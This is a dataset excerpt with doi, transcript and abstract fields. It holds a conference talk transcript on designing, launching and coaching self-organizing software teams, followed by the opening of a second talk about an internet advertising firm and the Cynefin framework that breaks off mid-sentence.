doi
stringlengths 17
24
| transcript
stringlengths 305
148k
| abstract
stringlengths 5
6.38k
|
---|---|---|
10.5446/50965 (DOI)
|
The time has arrived. Thank you for coming to my session. My name is Esther Derby and I'm here to talk to you today about self-organizing teams, what it really means. How many of you were in Mike Cohen's session on leading self-organizing teams? So some of you were, okay, I have a little different take so you might hear some different things. That's okay, there's more than one way to think about things. I want to start by asking a question. How many of you have been on a really fabulous team? Yeah, so just take 10 seconds and think about what it was like to be on that team. And now tell me in a word or two, what were some of the characteristics about those fabulous teams that you've been on? Just a word or two. Helpful? Yeah? Recommendation. Recommendation? Oh, communication. So it was helpful, there was good communication. There was motivation. Self-contained. There was a lot of cooperation. It was fun. Who else has a word about one of these great teams they've been on? Any other words? Ending with fun is not a bad word. Most of us who have had one of those team experiences always want to return to it because it just is a fabulous way to work. I mean, you go in every day and you have ups and downs but you're generally energized and you find you can do more than you could on your own. It's one of those experiences we always want to go back to. Making a team is not a random event. On the other hand, there are no guarantees but there are some things we can do to make it more likely that the patterns of self-organization and the pattern that we described within this group where we have good communication, motivation, fun, we're helpful to each other, all of those words play out. There are things we can do to make that more likely to happen. That's part of what I'm going to talk about today is how can you create the conditions for self-organizing teams, what it means to managers, what it means to people on the team to be part of a self-organizing team, and then just a couple of words about coaching because within the agile world there's a lot of emphasis on coaching. I want to say a little bit about how that plays out with self-organizing teams. Sound like a reasonable way to spend an hour? How many of you have had this experience when you started a team? We're self-organizing. We don't need no stinking managers. Does that ever come up? Yeah, there's a myth about that that teams don't actually need managers or management. They actually need both, but in very different ways than we're used to. Let's talk about an interesting set of numbers. What comes to mind when you see these numbers? 60, 30, 10. Any guesses about what these mean? Their percentages? Yeah, absolutely. Any idea what they refer to? This comes out of the work of a guy named J. Richard Hackman, and they reflect the percent of variation in a team and the sources of those variation when you look about team effectiveness. So 60% of the variation in team effectiveness comes from the way the team is designed. When we're talking about designing, we're talking about how the team is selected, and there's lots of ways to select team members. You can appoint them using the five use method. Does anybody know the five use method of selecting a team? I bet some of you experienced. It goes, you, you, you, you, you. You're a team. That's not a good design principle, but there are, there are many other ways to do it. You could self-select. You could, you could use a, a process that's much like hiring. There's things, various ways to select a team. So that's one aspect of it. Thinking about the goal is another aspect of it. Thinking about the space the team will be in. All of these things are aspects of the design of the team. So that's 60%, 60% of the variation. The five use method does not help very much when we're looking at design of a team. Where do you think most of the, most of the time gets spent in a typical organization on helping a team excel? What would your guess be? Any guesses? In many organizations, most of the emphasis on helping a team succeed goes into coaching. So which one of those numbers do you think is related to coaching? 10. Right. Right. 10% of the variation is accounted for by, by coaching. The 30% refers to how a team is launched, in how they're brought together and how the issues are presented to them and how, how they go about narrowing the gap between their understanding about what their task is and how they go about figuring out how are we going to make the best use of our diverse skills and what are our diverse skills? That accounts for 30% of the variation. And those are, those are two of the big issues in any self-organizing team, which is what are our diverse skills because skills that are not held by the majority of the team members very often are not taken into account. There's some research that shows that people who have divergent knowledge have to bring that to the table 20 to 30 times before it gets, gets heard. So the ability of a team to take advantage of all of the knowledge that's contained in the team is critical and that's often established in the very early stages of a team. These critical initial conditions make a big difference. Also the agreements the team makes on how they're going to work together often happen at the inception of the team and of course evolve over time. But that, that makes a big difference too about how the team's going to work. So the design of the team counts for 60, the way the team is launched and the way they are first interactions happen accounts for 30% of the variation in terms of team effectiveness. Is that number surprising to anyone? No? Okay. Well, in, in, given what I see in the US and the way people treat teams, this is, this number surprises a lot of people. So this is good to hear that this is not surprising here in Norway. Okay. So something changed order, but that's okay. We talked about the design. Part of what goes into a team being successful is not just who's there, but how they have enabling conditions. So enabling conditions have to do with having information about the task, having information about the context that they're in, so the big picture of the work they're doing, so they understand how their work fits into the overall picture of what the organization is doing, having access to outside expertise. Because even though you try to have a cross-functional team, there's almost inevitably something that they don't know. And rather than, you know, always disbanding and forming teams and the effort to get the perfect team, it makes more sense to have a team stay together and then have access to outside expertise for issues where they may not have the particular knowledge or skill that they need. The third pillar, which I am doing in a different order, is material support, which means that they have access to the right materials, the right computers, the right space, and all of those material things that enable them to do their work. And finally, a connection to the organization, which you can think of as a feedback loop that keeps them aligned with what the organization needs them to do. So in Agile, that's often the product demo that happens at the end where folks get together and show the product to the customer so that they can stay aligned with what the company actually needs the team to do. So those are the enabling conditions. Those are part of the design work, part of the design work for the team. And of course we have to consider that we have a real team. Because very often all sorts of groups of people are called teams, whether they actually meet the characteristics of a team or not. One of our American presidents once said, you can call a tail a leg, but that doesn't mean you have a five-legged dog. So you can call any group of people a team, but that doesn't mean they are an actual team. They have to have a handful of characteristics, which are that they have interdependent work. So it's not that they are each doing their own work, and somehow the sum total of that adds up, that their work is interdependent on a day-to-day basis, that they are mutually accountable and mutually responsible. So it's not a matter of, well, if you get your work done, then the devil take the rest. They are mutually accountable for the success of the whole team. They all fail or succeed together. They have complementary skills. So there may be some overlap, but each person has unique skills. There's a lot of talk in the agile world about generalizing specialists and specializing generalists. It's not the goal that everybody have exactly the same set of skills, or everybody can do every job, but that they are complementary, and the collection of the skills is sufficient to do the work at hand. And again, you may need access to outside expertise, because you're never going to have the perfect team. So that's important to consider, but complementary in general. Small in size. How many of you are on teams of three people? Yeah, that's kind of the minimum to have any sense of teaminess. If it's just two, it just doesn't feel like it's a team generally. But when you have three people, you can feel like, well, some other people have my back, we have a different set of skills, we have different viewpoints, we have a mix here that we can bring together in different styles and different knowledge. How many of you are on teams bigger than 10? Yeah, just a couple. When you have more than 10 people, it tends to break down into subgroups, either because the work naturally breaks down, the work is big enough that there's a natural breakdown in the work, or because the communication overhead is just too big to keep going with that number of people. So it will break down either on the basis of the people who have similar work, if you're lucky, or if you haven't thought about it enough, it will break down on the people who are friends or who see other people as enemies. It will break down on some random fracture line, which may not be helpful to the team. So when you get more than 10, it tends to break into subgroups. Less than three doesn't feel like a team. And according to some research, five is the ideal number of people on a team. How many of you are on a team of five? Yeah, a couple of you. The number five comes out of research again from Hackman that says, in theory, each person you add brings more capacity. However, each person also adds to the process overhead in terms of coordinating communication, in terms of maintaining relationships, in terms of how do you pass knowledge through the group. So at five, the process overhead starts to cancel out the theoretical capacity of another person being added to the team. And the more people you add, the less you are able to take advantage of that theoretical capacity. So five, according to some research, is the ideal. Not every team can be that. Seven, nine, they're usually reasonable. So somewhere in that range, seven plus or minus two, contributes to having a real team. I want to go back to the goal for a minute, because that's an essential characteristic of a team. It's not a design, but it is so central to a group being a team, because I have never seen a group succeed if they didn't have some sort of compelling work goal. And I have seen groups do amazing things when they do have a compelling work goal. This is something that we often don't pay a lot of attention to when we're putting groups together. We give them something like, oh, go do maintenance. How compelling is that? Create this feature. How compelling is that? It's not very interesting. People don't get engaged in it. Goals that relate to how we're going to make life better for some other people tend to be more engaging. So if you can frame the goal for the team in terms of how we are going to make life better for some other group of people, that's more likely to engage people and tap into their intrinsic motivation. Now, we have a tendency to over-specify goals. So it must do this, an X, Y, Z, A, B, C, Q, R, S, and we add on conditions and conditions and conditions until there's not much room for creativity left. So there is an art to coming up with the minimum specification for the team's goal that allows them to really take advantage of all of the diverse skills they have and make the most use of their creativity. So minimum specification and the thou shalt nots. So the goal forms a sort of boundary and thou shalt not sets out the unacceptable solutions and the behavior and the solutions that are unacceptable. So that's an equally important part of setting a goal for a team because one of the most demoralizing things that can happen to a team is that they're given a goal and they go off and do something and they think it's wonderful and they bring it back and the customer or their manager says, oh, well, anything but that. That's demoralizing. So the unacceptable solutions are equally important. One sort of silly example, well, it's not silly. It's actually an interesting example that I do some work in a workshop called Problem Solving Leadership and one of the things we do there is we design an exercise. We have teams design an exercise for the other team to solve. It's an exercise in delegation. And one of the thou shalt nots is that the exercise that you give this other team should not include killing anyone because one time a group came up with a design that said, well, we're going to pretend that we have this terrible virus and everybody's affected and we can only cure three people and you have to decide who's going to die. So that was clearly an unacceptable solution because it brings up too many horrible things for people to deal with. So thinking of the thou shalt nots is equally important as to thinking about what is the goal and what we're trying to accomplish, who are we making life better for? I'm going to skip that one. One of the things that we run into when we try to have self-organizing teams is a dynamic that exists in many organizations where the managers are looking down to the team saying, you need to get some stuff done. You're empowered now. You're self-organizing. You need to make decisions. And the team is looking back up at the manager saying, hmm, I wonder if he really means it this time. Last time they told us we were empowered and only lasted for about six weeks. Does anyone ever, does that sound familiar to anyone in this group? You've had that experience? It's very common, it's very common that this dynamic is in place and this is something that we need to work against when we're moving into working with self-organizing teams. Because it's present and if we don't acknowledge it and take some steps to counteract it, then we'll run into problems. I guess the manager will say, you're empowered, make this decision. And the team will either be wondering if he really means it or they may not know how to do the decision or do the task that the manager has delegated to them. And the manager will be getting impatient and tapping his foot and the team will be saying, sooner or later the manager gets frustrated and steps in. And then they say, see, it's just like last time. He didn't mean it. So we need to attend to this dynamic. There's a couple things we can do about that as part of designing a team and launching a team. One is to be clear about what is the mix of technical and management work that people are taking on. How much self-management are they actually taking on when they become self-organizing? Many teams and manager-led teams are way on this end of the box. So they have a lot of technical work and not much work that's involved with self-management. That doesn't really allow them to take advantage of their creativity. It doesn't allow them to reach these surpassing results. It doesn't create the sort of fun team where there was good communication and people took self-responsibility and they were collaborative and helpful that we talked about at the very beginning when you told me about those teams. Nor do most teams want to be at the other end where they're doing all management work and not much technical work. I talked to one company where they had spent millions and millions and millions of dollars getting their teams to be completely self-managing. So they took on all management work. And they were doing so little technical work that many of them started leaving because they hadn't come there to do management work. They'd come there to do technical work. And eventually someone noticed that there was this huge amount of turnover and said, well, why are you leaving? A lot of people are leaving to go work at this company that's really top down and control oriented and you're going to be under your boss's thumb. Why do you want to do that? And the people said, well, at least we'll get to do the work we really are trained to do and we love to do. So we'll put up with the boss, but we'll at least get to do work we like. So there's a balance in here. There's always a balance in here. When you're looking at creating a team that's really going to be excellent, that's going to do excellent work and it's going to be a, did I get too close? Is it okay now? Sometimes when you stand too close to these, they make horrible sounds. I'll try not to do that again. Okay, my brain just rebooted. What was I talking about? Oh yes, the company that pushed people too far to that end of the box where they were doing too much management work. It's always a balance. You want to create a relationship where it's partnership, not all of the management shoved on to the technical teams who are trying to actually produce software and not all of the management and self management kept by the manager. It needs to be a partnership that shares power. Part of how we can look at that is by being careful about how we delegate decisions and being clear about which decisions belong to the team, which decisions stay with the manager, and which decisions are shared. This is one of the areas where teams often get into that up looking up and looking down cycle where the team will believe that they have been delegated a decision and they'll make a decision and then the manager comes back and says, no, you can't do that, which sets that dynamic up and says, you really didn't mean we're empowered. You told us we were empowered, you didn't mean it. That shuts down the team. Being clear about this is very, very helpful. I generally do an exercise when I'm launching a team, which is part of that 30% the launch, that says let's look at the sorts of decisions that typically happen and we'll figure out and we'll come to an agreement about which ones the team can take care of within some boundaries and within some thou shalt nots, which ones are shared, where we're going to make the decision together in various ways and which ones stay with management. Who can give me an example of a decision that would most likely rest completely with the team within some boundaries? Anyone? Yes? We have time to do, like, half a day we can meet the deadline and they have half a day doing something else, for example, some research. So you think that should be a team decision? Basically, I think that's a great decision for a team to make and I think in many organizations it needs management support, but that's a very interesting one because if you tell a team I want you to learn and improve but then you don't give them any time to do research, you're sending a contradictory message, right, which sets up that cycle again of oh, you don't really mean that. Yeah, so that's a reasonable thing for a team to decide. What might be a shared decision? Between the manager and the team. Everything often falls in this one as a shared decision. I think it's really critical for the team to have a very big say in who comes on to the team. They may not make the final arrangements with HR, they may not make the final salary decisions, but they should be involved in deciding what sort of skills we're looking for, what are the interpersonal characteristics we're looking for, they're involved in interviewing candidates and might be involved in pairing auditions with candidates because after all, they're the people who have to work with this person. So it's important that they have a vested interest in helping this person work, work out on the team because when the manager makes the hiring decision alone, he's the one with the most vested interest in this person succeeding. And it's very easy for the team to say, not our fault, you stuck us with this bozo, it's your problem. So I think that's a critical shared decision. I think that's really critical as a shared decision if you want a team to self-organize and be self-responsible. I think budget decisions can be shared. I think how the training budget gets spent should stay with the team. I think that's an important one to stay with the team because that's another one where you can send a very mixed message to a group when you say, we want you to learn and improve and you have a training budget, but then when you select a class, you must come to me and get approval. I talked to one guy who took his boss to heart when they delegated the training decision and selected a course he thought would be very useful and he had to go to his manager for approval and says, well, no one, his manager said, no one in our company has taken that class, how do we know it's any good? And so the guy went back and did some research and brought that back to his manager and he says, well, you must take it to HR now and have it vetted by HR. And he had it vetted by HR and then he had to go and finally he just said, no, I'm not going to work to get myself to this class anymore because clearly you were not being honest when you told us that we had responsibility for the training budget. So when you delegate some decision like that, the money has to go with it because it's a very confusing message to send to a team to say, you're empowered, you're self-organizing, you take responsibility for your improvement, but then you have to come to the manager on Bended D. So looking through these decisions is a very important thing to do and talking about where they're going to be because that eliminates some of the tendency for that cycle of looking up, looking down to kick in. You guys have invisible fence here, do you guys know what that is? Any dog owners in the room? Yeah, well in the US they have this thing called invisible fence, which is actually a terrible thing, but they bury electric wire in the ground and then the dog wears a collar so that if he goes across this line he gets a shock. The theory is that then the dog will learn to stay in his little box. I don't recommend it, it does exist. But if you don't, as a manager, if you're not clear and you don't negotiate with the team what the decisions are, the team ends up feeling like, you know, if we step over this line we might get shocked and we don't know exactly where the line is buried because it can move all the time. And if the team has that experience often enough of crossing a line they didn't know exists eventually they stop making any decisions that paralyzes the team. So this is a critical, critical part to launching. Okay, within the team for the folks on the team there are some balancing acts that always take place. And Rishina Hoda, who did her PhD research on self-organizing Agile teams, was the first that I know that named these, but they do ring true to the teams that I've seen and I've worked with. So the first is balancing learning and delivery, which goes right to the point that you mentioned, that if you really want a team to learn and improve you have to balance learning and delivery. So if you say you want the team to have retrospectives and come up with actions to improve but then you never leave any room on the plan for those pieces of improvement work to be done, there is no room for learning. On the other hand, you know, they can't be learning all the time, there's still a need, you're still a business, you need to keep that, keep the delivery in mind. So that's a balancing act that plays out for members on the team. They're always looking at that balancing act. If you don't have learning, for most people it gets to be sort of boring to be on a team. That's a critical part of being on a team is the ability to learn and the ability to learn together. That's really one of the core improvement units of improvement for a team. Jerry Weinberg did research long ago that showed that the possibility for improvement if you didn't have some structured way to look at it within a team was essentially random. But if you did have some structured way to look at improvement and you built the time for that, that was a critical unit of improvement within an organization, was improvement within the team, their ability to learn together, to think together, to take on new skills and later research has confirmed that teams do learn to learn together over time. So critical balancing act, something to pay attention to, and as managers, going back to the manager's role, supporting that ability by protecting some time for the team to spend on learning and improvement activities. Specialization versus our work, my specialization versus our work is another critical balancing act, and this goes back to the cross functional skills and making sure that people are making use of the diverse skills within the group, within the team. I worked with one group not too long ago who the testers were still very much in, I do testing, and the developers were still very much in, I do development. And so they would get to the end of their iteration and the developers would be done, done, as in it works on my machine and I didn't find anything that broke, and the testers would still be testing. So their work would slop over into the next iteration. So it would often be three or four iterations before they actually knew that something was done. So what we did with that group was we looked at what's our shared definition of done, and if the development is done but the testing isn't done, it doesn't count for done. So that's part of balancing what my specialization is versus our work and our goal. Our goal is to deliver this feature, not my goal is to get the development done and if the testing isn't done, well, it's not my fault. If the testing isn't done, it's a failure of the team. So balancing my work versus our work, balancing my specialization versus the needs for all of us to get our work done. I actually spoke to someone yesterday who was saying, we have a bunch of new guys on our team and they don't understand the domain and some of them are just learning the technology, but the experts, our senior guys don't want to work with them because it slows them down. So the senior guys are doing their work and being really productive and half the team is sitting there unable to do anything. So this is another one, my specialization versus our work. Yes, personally, you might go slower if you're helping the new guy, but as a team, you're developing the capability to speed up. So as a team, you're developing your capability, you're bringing everybody up, you're allowing people to be productive who weren't productive before. It plays out also in terms of specific skills like, well, I'm a database guy, you're not a database guy, so all database work has to go through me which creates a bottleneck. This guy might be able to do some database work, maybe not as fast, but he'd learn if the work were shared. So over time, over time, there's a diffusion of skills so people may not become as good a database programmer, as good a UX programmer or whatever, but they gain some skill in that and having that redundancy creates flexibility in the team and allows them to respond more effectively to challenges. So it's a balancing act and if you keep it in balance, it creates more capability for the team over time. Flexibility leads to speed, flexibility leads to better decisions and allows the company as a whole to be more flexible in how they do work. The third balancing act has to do with autonomy and responsibility. Self-organizing teams, agile teams are given a lot of autonomy, but they also have responsibility. This ties back to that first picture of, well, we don't need no stinking managers, leave us alone. Well, you may not need the same kind of manager, but you still are a team within a context and you're responsible for producing a product. Responsible for producing a product that's valuable to the company that's paying your salary. So there's responsibility that goes with that to be checking in with the customer, to be developing valuable software that goes along with the autonomy that you're given. Being clear about the decision boundaries helps this one. Using those robust feedback groups with the organization helps this one, making sure that you're tied back to the organization. I talk to all sorts of groups that do all sorts of silly things. They're really smart people, but they end up doing these silly things. So it's not that I think people are stupid, it's just these are the stories that I get to hear, silly things that happen. So I talk to one group that the managers were just, they were beside themselves, they didn't know what to do because they had set up a self-organizing team and the team had been working for two years and hadn't produced one single bit of software. What do you think I told the managers to do? Get in there right now. So this team had gone way too far on the autonomy side. They had said, we don't need no sticking managers, don't bother us, leave us alone, we're working, we'll show you when you're ready. And that went on for two years. So they had ignored the responsibility part of this balancing act. And their managers had fallen into the trap of saying, oh no, we don't want to interfere, which leads us to the managers balancing act. Which is when do you step in? When do you step in? It's possible to step in too soon, which kicks in that loop of the manager and the team and the team saying, well, he didn't really mean it when he told us we were empowered. Or you can wait too long in which case the team feels like they've been abandoned. I talked to one group who they had a person who their manager had stuck on the team without any consultation. And it turned out that the guy didn't really want to follow any of the shared approaches that the team had agreed to. And they did their best to kind of bring him along and say, well, this is how we work here. And we have a stand up every day and we talk about what we've been working on. So they'd have a stand up and everybody would go around the room and say, I've been working on this feature, I've been working on this story, I'm running into this problem. And the guy that the manager had stuck on the team would say, I'm coding. They say, well, what are you coding? I'm coding, leave me alone. So this went on for a while and they tried to bring him into the fold. And finally they said, we never know what you're doing, so don't take any of these stories because we need to know where they're going. And so he would surreptitiously take stories and he would take the code and lock it on his own machine so no one else could see what was going on. They did everything they could think of and they finally went to their manager and said, we tried everything we know how to do. And this guy just, that you brought to our team, he won't work. He goes off and he does things that take weeks, we don't know what's going on. He doesn't come to our stand ups anymore. He threatened to slap one of our team members, which he really did. He threatened to slap her. She'd had some dental work done and he said, well then you won't even feel it. You've had no vacane so I can slap you all day. This is kind of bizarre behavior. So they went to their manager and the manager just said, well, you're self organizing. It's your problem. Solve it. They felt abandoned. Right? So there's a balancing act for managers to know when to step in. And there are ways to go about it. You can always ask if a team needs help. You can always bring the team back to the purpose. You can always reiterate what the goal of the team is and say, how do you feel you're doing on meeting that? Do you feel like you're tracking? Let's look at the evidence. You can always do that sort of thing because sometimes that sort of feedback loop resets the team and helps them reenergize around the goal and the purpose that they're supposed to do. You can always state what you're observing. It seems to me that you guys are struggling on this and you've been churning on this decision for a while. Here's the implications of not making the decision. Here's some ways I can help. Would that be helpful to you? At a certain point if the team doesn't respond to that suggestions, then you can be a little more forceful. But if you start from a directive position, if you start by saying, get with it. This is what you're supposed to do. That kicks in that dynamic again. That kicks in the looking up, looking down dynamic and again reinforces to the team that you didn't really mean it when you said we were empowered and self-organizing. So we're going to be paralyzed. So that's a balancing act that takes some discernment. Okay. Something about coaching. How many of you have coaches on your teams? Anyone? One. Okay. Are these coaches that stayed with the team for a long time? Yeah. So when you think back to the 60, 30, 10, 60% of team effectiveness is related to the design, 30% to the way they're launched, 10% to coaching. But what this diagram says, what this is from again research from Hackman and one of his colleagues, Wageman, that if you have a well-designed team and you have effective coaching, it's it can really help. If you have a poorly, if you have a well-designed team and you have poor, all right, let me do a little reset there. If you have a well-designed team and you have poor coaching, it might help a little. If you have a poorly designed team and you have ineffective coaching, it's going to hurt a lot. And even if you have good coaching, it's not going to be very effective. So design is everything, right? Design is 60%. You need to really pay attention to those initial conditions for the team so that if you have coaching, effective coaching will help the team, right? You can have a great coach and if you have a poorly designed team, they're not going to be able to make a lot of difference. And the first thing that coach should probably be doing is revisiting the elements of design and making sure that those design elements are in place. There's also a paradox of coaching that came up once again for me just a couple of weeks ago when I talked to one of the teams I had worked with. And they said to me, we couldn't have done it without you and we couldn't have done it with you. So I had spent some time with this group in their initial conditions. I spent some time with them helping them understand the tasks that they were working on, looking at the goal, looking at the shouts and the shout-nots. I spent some time with them figuring out, helping them figure out how they were going to work together. I spent time with them helping them to self-observe what was going on in their team so that they could do some diagnosis of what was going on and make some changes within their team. I let them know something about the pitfalls and then I went away. And I heard later about all this drama that happened on the team while I was away. And then I saw their result and their result was fantastic. It was fantastic. They really did a fabulous job. And this is what they said to me. That initial setup was crucial to them. They couldn't have done it without that initial setup. But if I had stayed there the whole time, they never would have gone through some of that drama they needed to go through to really form as a team and figure out their relationships and figure out how to work together. So they needed both. They needed me there to help them with the initial conditions. They needed some space to figure out how to work together and how to be a team. Because essentially and in the end, if we want a self-organizing team, we have to set the initial conditions and then it's up to the team as to whether they're going to really self-organize and produce and work together as a team. When we come right down to it, self-organizing really means that the team is capable of coming up with new responses and new routines based on the challenges that they're experiencing. That depends on the initial conditions that we set for the team, how we help them understand their goal, how we help them take advantage of their diverse skills, how we help them have a process that is robust and that will enable them to make decisions. It depends on how we clarify, has managers, how we're going to work with the teams. It doesn't need to be the manager who initiates that. A team member can initiate that. Any team member can say, well, let's talk about what sort of decisions we make and how we're going to make them. Because we don't want to step on your toes. We want to know what we can do. So we can do a good job without feeling like we're going outside our boundaries. That negotiation can start from either side. We need to help the team understand some things about how they're going to work together. We need to make sure they have access to outside expertise. Then we stand a chance, no guarantees, but we stand a much better chance of having a team that's going to really produce the experience that we talked about, of being fun, of being helpful, of having great communication, of producing great results. But we stand an uncertainty. I think it's worth investing 60% in design and 30% in launch to give a team a great chance. Because that is when work works really well, it's almost always because of teams. How many of you have questions at this point? Who has questions? Yeah? I'm wondering when you talk about the team and managers like this, if you have a team that has a scrum master, would that be part of the team or would that be the manager? The question was, if you have a team with a scrum master, is that part of the team or part of the manager? It's a tricky role. Because the scrum master's role is to help the team follow a process and help the team self-observe, they are by definition out of the team because they are working on the meta level. Any time you have a team and one person goes meta and the other people don't, whether it is named that or not, they feel like they are someone not in the team. In your case, is the scrum master also writing code? Yeah, so he's not writing code. He's not mutually accountable in the same way that the other team members are. That goes back to the definition of the team, that they are mutually accountable to each other and they make commitments to each other. The scrum master has a different sort of role in that he's not making commitments to doing work to create the product. The role is of the team but not in the team. Most scrum masters don't have management authority, so they can't negotiate what the decision boundaries are. They're there in a role that doesn't fit either of those and spans both of them in that they are in a position to help the team because of their observations if they know something about team dynamics and a position to help the team make the best use of their resources and make good decisions about their group process if they understand group process. If they only understand the rudiments of scrum, then that's the only thing they can help with. They're in neither another world there in between. Did that answer your question? Other questions? Yeah? A couple of suborganized teams in the company and they make their own decisions and perhaps some of those decisions starts to nudge or interpret how the work process in the company is made. How big is the company? The question was if you have two self-organizing teams and they're starting to make decisions two or more that are starting to make decisions that affect the company work process, how big is the company? That's a theoretical question. Well, a lot of companies have the company process. What they have is they have the company process document. I think expecting every team to follow a rigid prescribed process is in some ways an exercise in futility and in some ways is a detriment to the ability of the team to self-organize. It depends on what level that definition is. There can be some core agreements as a company about how we act and what our process is as it relates to our ability to deliver value to our customers. As it relates to the day-to-day work of the team, if they want to come up with a process that is most effective for them as long as it does not make someone else less effective, I'm fine with that. I don't think every team has to hue to the same process or stick to the same process because they're working on a different problem. They've got a different group of people. They're under different conditions in various sorts of ways. It seems normal to me that they would develop their own unique way of dealing with the situation. Otherwise, they're not taking advantage of the skills they have. The key is is it making it harder for someone else to do their work? That's another question of local optimization versus global optimization. Did I answer your question? Other questions about this curious thing called the self-organizing team? I'm sorry, I almost didn't see your hand. The question is, if you're putting together a great team, you're putting together good teams. You're trying to pay attention to the design of a team. You've found a place for all of the people who are the good performers and then you have some people who are not so good. What do you do with them? First I try to get really curious about why they're not so good. Presumably, when you hired them, you hired them because they were a good fit. That's what I presume. Then I try to figure out why have they not lived up to what was perceived as being the potential. Are they lacking some key skills? Can we get them the skills so that they will be contributing team members? Some people just aren't cut out for teamwork. If you get people who just absolutely, positively cannot work on a team because of their interpersonal skills or their psychological profile, then sometimes there's work that can be done by a single person. I might try to find that sort of work. If they've just been having a negative experience or they weren't engaged in their work because the goal was stated in such a way that no one would engage in it, then I might give them a try on a team. I think it depends on precisely what the issue is and if I feel like they can still provide some value in one of the teams and not be destructive to the team. The question really is should you raise their skill levels before they enter a team or should they do that sort of improvement within the team? The second part of the question is should they raise their skill levels before they go on to a team or do it as part of a team? I would say do it as part of a team because people just learn better when they're actually doing something that makes sense. Then you have to take that into account when you are looking at what you expect the team to produce because they will, you know, the learning curve always takes time and it will in the short term take some time for the rest of the team. I thought there's a woman in the US, Nancy Von, this long Dutch name that no one can pronounce so we just call her Nancy Van S. If there's anyone Dutch they might be able to pronounce it in the room. She took a team that had been identified as the losers, you know, it's like here Nancy you get this team that's the losers. Oh joy, oh happy day. But she decided to not look at them as losers and she slowly but surely introduced all of the XP practices to them and they actually ended up doing great stuff. They ended up actually doing really good work. So there was something else going on with that team and I've seen that happen more than once. There are people who should not be employed in your company. Maybe they should be employed for the competition. I don't know how difficult it is to actually go through the process of terminating employment in Norway. Extremely difficult. And sometimes I think even though it's extremely difficult, that's what you have to do. He was fired but it was a US company. So excuse me, can I get you to turn this off for just a minute? I'm good now. Thank you. You didn't want to hear me cough in your ears and magnified did you? Not my mouth. Now I think I'm okay. I hope I'm okay. Right, so this is not a defense against difficult questions. The thing you have to be careful about with these folks who just, for whatever psychological reason, can't work is that not giving them work is such an assault to their sense of self that I know of at least one instance where someone was very, very difficult and so they denied him all work. They just said, you go sit on that desk over there and don't do any work. And he committed suicide. So it's a tricky thing, right? Because software development is too hard to have someone on your team who is acting as a boat anchor, right? And just arguing all the time and holding the team back. On the other hand, you know, work is really associated with self-worth, so you have to figure out a way to work it. And sometimes the best way is to deal with the really difficult thing of getting someone out of your company. I assume it costs money to do that, money and management time, and there's a tradeoff between how much drag it is putting on the team, how much lost productivity you have because of this versus what it takes to actually terminate employment. And if you look at the impact on the other team members, it's very often an equal equation, plus it depresses the morale. So once you make the move, the morale often goes up. But again, I am not familiar with the Norwegian employment laws. So that's the best I can offer you. Alright, other questions? Yes. I think it really depends on the situation of the team. So I think it's helpful for a coach for them to have a coach when they start. I think it's helpful for people to have a coach if they have a fairly large group and they need to make decisions because they'll need facilitation. It's helpful for a team to have a coach if they are taking on some new processes or a new skill, a technical skill. I think it can be helpful when they've done some retrospectives and they want to make a significant change. That's my experience. The research I've read about this, which again comes from these fine folks, says that the most effective coaching happens during launching when you're getting them started and then about halfway through their work together. Because they've done some things together and they've had a chance to work together and they might have a better idea about where they want to make some changes. The coach is very trendy in the U.S. too. I think one, you need to be real clear about what sort of coach you need for what team. You need to start again and do a job analysis so you pick the right person for the right team. Thank you for coming for my talk. I think it better be over now because I'm just clothed.
|
“Self-organizing team” may be the most over-used, mis-understood, vague, and mis-leading phrase of the decade. So what is a self-organizing team? How are self-organizing teams different from other teams? How can managers and team members get the self-organizing mojo going? What are the challenges that self-organizing teams face? In this workshop, we’ll explore all these questions and get beyond the buzzword.
|
10.5446/50966 (DOI)
|
So, while we're maybe waiting for a few strikers to come in, let me understand my audience here. How many people are scrumbasters? I hope we can see themselves kind of not programmers in their major role in the company. Okay. Sorry, I apologize to you before I start. I'm going to be perhaps insulting you. Yeah, wish half. You'll have to tell me if you've both been insulted. I'm equal opportunity. So my name is Fred George. I'm originally American, but I've lived in London for the last six years. I'm doing some interesting work for an interesting company. So that's what I'm going to talk about today. There have been a lot of sessions here so far, especially in this room around teams and how teams work and some theories behind that and the like. I'm only going to talk about what I've actually done. So I'm not necessarily the guy who's going to read the books. I kind of come to these sessions myself so I can understand without having to read the book because other people have read the books and they tell us about them. I like that. I'm lazy. But this is my experience at a company called Forward. It's an internet advertising firm in London, although it's kind of hard to say what we really do because we have these various commercial and consumer-oriented products. And there's almost nothing of rhyme and reason to these products. We have USwitch because USwitch actually is an energy switching firm. You can switch energy plans in the UK the same way most people switch phone plans. But you can do that with your energy. Invisible Hand is a browser plug-in that does dynamic price comparison based on what page you're looking at. It runs in all the browsers. Omoio is phone comparison. Petvilla is selling pet products. We have cornered the market on parrot cages in the UK. So again, where's the theme here? Lightbird is also cages. Fort 3D is actually an internet advertising agency. We do advertising in 15 different languages for various clients across the world. Put a lot of Google keywords up there. In fact, just one client alone, we have 40 million keywords that we manage around. Generally, a big account is 50,000. So we've used technology to push that by three orders of magnitude above that. So there's really no theme to that. What you'll see is we're basically opportunistic and we basically think that speed is a competitive advantage and we leverage technology like crazy. So the reason, I'm sorry because we have a bit of an advantage with the audience in here. I want to talk about success at that because sometimes we have success is driven by some of the strange things we're doing. And yet we're doing strange things but we're making a lot of money doing these strange things. And it's usually important to point out. So if you look at the performance of the company, it's not that old. It's only been around for about seven years now. And it's got the typical hockey curve that you like to see for our revenue. So in fact, the last year I show here is 2009 officially. Although 2010 numbers are actually out officially now. But we had 55 employees. We made 55 million pounds. So it's a million quid per employee. That puts us in rarefied territory. And also can hide a lot of mistakes. So we're actually anticipating that, and by the way, the profits were actually starting to soar as well. We started to make a lot of money off of this. We were projected that in 2010 we'd do 100 million and 15 million profit. We actually did 120 million and 23 million profit. Generally, we blow the estimates pretty badly that way. So we're successful. And I sort of say, well, why is this working? What are we doing that's making this work? And fortunately, another guy who reads books came and visited us and talked to us about some stuff. And one of the things that he gave to me was this concept of this Kennethon framework. This Welch guy who worked for IBM for a while came up with an idea of how to classify problems. So I watched some of his videos. His guy's name is Dave Snowden. His videos are on YouTube. They're very interesting to watch, especially the one about birthday parties and how you organize birthday parties. It's quite silly. He published an article in Harvard Business Review about his work. It was unique in the annals of the Harvard Business Review because the editorial usually talks about all the articles. But in this particular issue of Harvard Business Review, the editorial only talked about his articles the first time ever that had happened because they thought it was that profound. So what he basically said was, you can sort of divide the world up into various types of problems that exist. And I'm grossly simplifying this. But he said basically the world consists of things like simple problems and complicated problems. And they have some key characteristics. A simple problem means the cause and effect relationship is very clear to see. If I stand here, my mouth, you'll hear me. If I turn the switch on, the light will go off. If I turn it back off, the light goes off. Very, very simple understanding of 